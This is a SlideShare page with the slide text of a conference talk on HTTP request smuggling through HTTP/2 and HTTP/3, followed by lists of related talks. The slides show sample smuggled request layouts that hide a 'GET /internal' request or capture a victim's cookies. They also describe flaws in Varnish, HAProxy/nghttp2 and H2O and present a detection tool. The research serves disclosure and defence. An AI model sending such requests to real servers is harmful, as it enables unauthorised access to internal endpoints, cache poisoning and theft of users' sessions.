SlideShare ist ein Scribd-Unternehmen logo

HTTP Request Smuggling via higher HTTP versions

N
neexemil

Slides from the talk by Emil Lerner at PhDays 10

Software
1 von 41
Downloaden Sie, um offline zu lesen
Emil Lerner HTTP Request Smuggling via higher HTTP versions
Emil Lerner independentsecurityresearcher CTO at WunderFund.io Bushwhackers CTF team @emil_lerner @neex
HTTP Client Server HTTP Response HTTP Request
Reverse proxy HTTP Response HTTP Request Client HTTP Response HTTP Request Frontend Server Backend Server
HTTP keep-alive HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 Client Server
HTTP/1.1 body transfer Content-Length header Content-Length: 100 Here goes 100 bytes of the request body. Transfer-Encoding: chunked ff 10 0 Here goes 255-byte chunk Another chunk Chunked encoding
HTTP keep-alive (to backend) HTTP Response 1 HTTP Request 1 HTTP Response 1 HTTP Request 1 HTTP Response 2 HTTP Request 2 HTTP Response 2 HTTP Request 2 Single backend connection Client2 connection Client1 connection Client1 Client2 Frontend Server Backend Server
HTTP Request Smuggling Old & known attack Gained a lot of attention after James Kettle's talk on BH USA 2019 He discovered a lot of new techniques
HTTP Request Smuggling An attacker sends a malicious request It is parsed as a single request by the frontend and is forwarded to the backend Backend parses it as two separate requests
POST / HTTP/1.1 Content-Length: 100 0 Transfer-Encoding : chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request HTTP Request Smuggling
HTTP Request Smuggling It's all about Content-Length / Transfer-Encoding Transfer-Encoding has precedence We need to "smuggle" Transfer-Encoding to backend unprocessed by the frontend
HTTP Request Smuggling POST / HTTP/1.1 Content-Length: 100 Transfer-Encoding: identity, 0 chunked GET /internal HTTP/1.1 ... Frontend interprets this Backend interprets this Frontend thinks it's body Backend thinks it's another request
Exploitation Accessing internal endpoints Cache poisoning Stealing other users’ requests
Exploitation: stealing requests Attacker→Frontend Victim→Frontend GET / HTTP/1.1 ... POST /save HTTP/1.1 Transfer-Encoding : chunked GET / HTTP/1.1 Cookie: secret GET / HTTP/1.1 Transfer-Encoding : chunked ... POST /save HTTP/1.1 data=GET / HTTP/1.1 Cookie: secret Frontend→Backend
Exploitation: stealing requests The victim's request is appended to ours Most frameworks are OK with newlines in forms Victim's cookies are saved to our profile, PMs or other places where we can view them later
HTTP/2 overview Widely adopted by now Binary protocol (no special chars) Almost always terminated at frontend
HTTP/2 termination :status 200 PRI * HTTP/2.0 <binary> :method GET HTTP/1.1 200 OK GET / HTTP/1.1 Frontend Backend Client
HTTP/2 body transfer Request body is transferred in binary frames Content-Length not required, but allowed Transfer-Encoding: chunked has no effect
Potential bug #1: content-length conflicts actual length Client→Frontend :method POST :authority host.com XGET /internal HTTP/1.1 ... content-length: 1 POST / HTTP/1.1 Host: host.com Content-Length: 1 XGET /internal HTTP/1.1 ... Frontend→Backend body
Potential bug #2: no content-length forwarding Client→Frontend :method :authority host.com GET /internal HTTP/1.1 GET GET / HTTP/1.1 Host: host.com GET /internal HTTP/1.1 Frontend→Backend body
Potential bug #3: content-length conflicting transfer-encoding Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding: chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer-Encoding: chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
HTTP/2 header validation Headers names and values are binary strings Names and values can contain newlines Names can contain colons
Potential bug #4: newlines in headers Client→Frontend :method GET :authority host.com x: ... ⏎⏎GET /internal HTTP/1.1 GET / HTTP/1.1 Host: host.com X: GET /internal HTTP/1.1 ... Frontend→Backend
Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding : chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 transfer-encoding : chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer_encoding: chunked POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer_Encoding: chunked 0 GET /internal HTTP/1.1 ... Frontend→Backend body
Potential bug(s) #5: less strict validation Client→Frontend :method POST :authority host.com content-length: 100 0 GET /internal HTTP/1.1 ... transfer-encoding: chunKed POST / HTTP/1.1 Host: host.com Content-Length: 100 Transfer-Encoding: chunKed 0 GET /internal HTTP/1.1 ... Frontend→Backend body
What does the RFC say? RFC 7540 mentions Intermediary Encapsulation Attacks in 10.3 Basically says "implementation must reject things it can't handle" :) Explicitly mentions newlines and x00
Detection idea #1: make backend expect more data Craft a request such that Backend expects more data Frontend thinks it sent the whole request The request will hang Implemented in James Kettle's Burp plugin (for HTTP/1.1)
Detection idea #1: make backend expect more data :method POST content-length: 5 h:⏎transfer-encoding:chunked fff Frontend interprets this Backend interprets this Frontend thinks body is finished Backend expects more data and hangs
Chunked encoding should never be parsed in HTTP/2 If the response depends on the chunked encoding validness, it is a possible vulnerability There're some false positives Detection idea #2: chunked body parsing
Detection idea #2: chunked body parsing :status 400 :method POST invalid chunked body transfer-encoding : chunked HTTP/1.1 400 POST / HTTP/1.1 transfer-encoding : chunked invalid chunked body Frontend Backend Client
Detection idea #3: content-length parsing Send something like x:x⏎content-length:1000 If the response depends on the value, it's a possible vulnerability Even more false positives :(
False positive scenario HTTP/2 HTTP/2 termination HTTP/1 processing HTTP/1.1 Frontend Backend Client
Varnish flaw Client→Varnish :method GET :authority host.com GET /internal HTTP/1.1 ... content-length: 0 GET / HTTP/1.1 Host: host.com content-length: 0 GET /internal HTTP/1.1 ... Varnish→Backend body
Potential bug #6: RFC 8441 Designed for WebSockets over HTTP/2 A client sends CONNECT method and sets the :protocol special header Intermediary translates it to Upgrade
Haproxy & nghttp2 flaws Client→Frontend :method :authority host.com GET /internal HTTP/1.1 ... CONNECT :protocol websocket GET / HTTP/1.1 Host: host.com Connection: upgrade Upgrade: websocket GET /internal HTTP/1.1 ... Frontend→Backend body
Open problem: one-way size discrepancy Attacks work if the backend reads less data than the frontend Detection methods work if the backend expects more data What if the first is achievable, but the second is not possible?
Client→Frontend Frontend→Backend H2O http3 (QUIC) flaw :method POST content-length: 100 0 GET /internal HTTP/1.1 ... x:x⏎transfer-encoding:chunked POST / HTTP/1.1 Content-length: 100 X: x Transfer-Encoding: chunked 0 GET /internal HTTP/1.1 ... body
Automation I've implemented http2smugl tool It performs automatic vulnerability detection using the discussed methods Also it supports sending "invalid" queries via custom HTTP/2 implementation
Further research needed HTTP/1 special headers, writing to closed streams, HPACK and >40 implementations not researched Stable detection methods wanted Putting space + path into :method can lead to hitting internal endpoints and Host override
Thank you! https://github.com/neex/http2smugl

Empfohlen

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 

Empfohlen

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Http request smuggling
Http request smugglingHttp request smuggling
Http request smugglingn|u - The Open Security Community
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource SharingLuke Weerasooriya
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World42Crunch
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101Shahee Mirza
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Ben Hayak
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security HeadersIsmael Goncalves
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0Cory Forsyth
 
Http2 kotlin
Http2 kotlinHttp2 kotlin
Http2 kotlinAndrii Bezruchko
 

Weitere ähnliche Inhalte

Was ist angesagt?

OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesFrans Rosén
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...Frans Rosén
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource SharingLuke Weerasooriya
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundDirkjanMollema
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World42Crunch
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigFrans Rosén
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)TzahiArabov
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
 
Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Ben Hayak
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 

Was ist angesagt? (20)

Http request smuggling
Http request smugglingHttp request smuggling
Http request smuggling
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource Sharing
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
 
Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)
 
HTTP Security Headers
HTTP Security HeadersHTTP Security Headers
HTTP Security Headers
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 

Ähnlich wie HTTP Request Smuggling via higher HTTP versions

HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0Cory Forsyth
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Ontico
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?timbc
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTPBen Ramsey
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksFelipe Prado
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsBen Ramsey
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Navaneethan Naveen
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2Ido Flatow
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersDenis Kolegov
 
Hypertex transfer protocol
Hypertex transfer protocolHypertex transfer protocol
Hypertex transfer protocolwanangwa234
 

Ähnlich wie HTTP Request Smuggling via higher HTTP versions (20)

HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
HTTP by Hand: Exploring HTTP/1.0, 1.1 and 2.0
 
Http2 kotlin
Http2 kotlinHttp2 kotlin
Http2 kotlin
 
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
Проксирование HTTP-запросов web-акселератором / Александр Крижановский (Tempe...
 
Http-protocol
Http-protocolHttp-protocol
Http-protocol
 
Interactive web. O rly?
Interactive web. O rly?Interactive web. O rly?
Interactive web. O rly?
 
Hidden Gems in HTTP
Hidden Gems in HTTPHidden Gems in HTTP
Hidden Gems in HTTP
 
HTTP
HTTPHTTP
HTTP
 
DEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacksDEF CON 27- ALBINOWAX - http desync attacks
DEF CON 27- ALBINOWAX - http desync attacks
 
Appl layer
Appl layerAppl layer
Appl layer
 
HTTP
HTTPHTTP
HTTP
 
Http
HttpHttp
Http
 
HTTP
HTTPHTTP
HTTP
 
Http request&response
Http request&responseHttp request&response
Http request&response
 
Making the Most of HTTP In Your Apps
Making the Most of HTTP In Your AppsMaking the Most of HTTP In Your Apps
Making the Most of HTTP In Your Apps
 
Starting With Php
Starting With PhpStarting With Php
Starting With Php
 
applayerslides.ppt
applayerslides.pptapplayerslides.ppt
applayerslides.ppt
 
Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014Http request&response by Vignesh 15 MAR 2014
Http request&response by Vignesh 15 MAR 2014
 
Introduction to HTTP/2
Introduction to HTTP/2Introduction to HTTP/2
Introduction to HTTP/2
 
Covert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache HeadersCovert Timing Channels using HTTP Cache Headers
Covert Timing Channels using HTTP Cache Headers
 
Hypertex transfer protocol
Hypertex transfer protocolHypertex transfer protocol
Hypertex transfer protocol
 

Kürzlich hochgeladen

Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesPhilip Schwarz
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noidabntitsolutionsrishis
 
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...
Open Source Summit NA 2024: Open Source Cloud Costs - OpenCost's Impact on En...Matt Ray
 
How to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfHow to Track Employee Performance A Comprehensive Guide.pdf
How to Track Employee Performance A Comprehensive Guide.pdfLivetecs LLC
 
Best Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfBest Web Development Agency- Idiosys USA.pdf
Best Web Development Agency- Idiosys USA.pdfIdiosysTechnologies1
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)jennyeacort
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...OnePlan Solutions
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...confluent
 
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfGOING AOT WITH GRAALVM – DEVOXX GREECE.pdf
GOING AOT WITH GRAALVM – DEVOXX GREECE.pdfAlina Yurenko
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfStefano Stabellini
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfFerryKemperman
 

Kürzlich hochgeladen (20)

Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
Folding Cheat Sheet #4 - fourth in a series
